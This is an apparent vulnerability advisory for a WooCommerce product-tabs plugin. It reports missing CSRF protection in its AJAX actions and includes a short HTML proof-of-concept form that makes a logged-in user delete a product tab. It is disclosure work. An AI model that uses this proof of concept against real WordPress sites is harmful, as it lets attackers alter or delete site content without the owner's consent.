Woocommerce Tabs Plugin, Add Custom Product Tabs <= 1.0.1 – Arbitrary Tab Deletion/Edition via CSRF | Plugin Vulnerabilities

Description

The plugin does not properly check for CSRF in its tab_session, tab_session_del, tab_session_edit and ptab_submit AJAX actions, allowing attacker to make logged in user call them via a CSRF attack

Proof of Concept

To delete a tab:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tab_session_del" />
      <input type="hidden" name="tab_id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

fma-products-tabs-pro

No known fix

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

c4835f86-68a8-40f8-9c6f-8bd57d5c04e0

Timeline

Publicly Published

2021-06-30 (about 4 years ago)

Added

2021-06-30 (about 4 years ago)

Last Updated

2021-06-30 (about 4 years ago)

Other

Published

Title

Published

2025-09-05

Title

WooCommerce Single Page Checkout <= 1.2.7 - Cross-Site Request Forgery

Published

2022-11-22

Title

All-In-One Security < 5.1.1 - Bulk Actions via CSRF

Published

2025-03-27

Title

Store Locator Widget < 2025r3r2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-10-25

Title

MAZ Loader < 1.4.1 - Arbitrary Loader Deletion via CSRF

Published

2024-06-28

Title

Uncanny Toolkit Pro for LearnDash < 4.1.4.1 - Cross-Site Request Forgery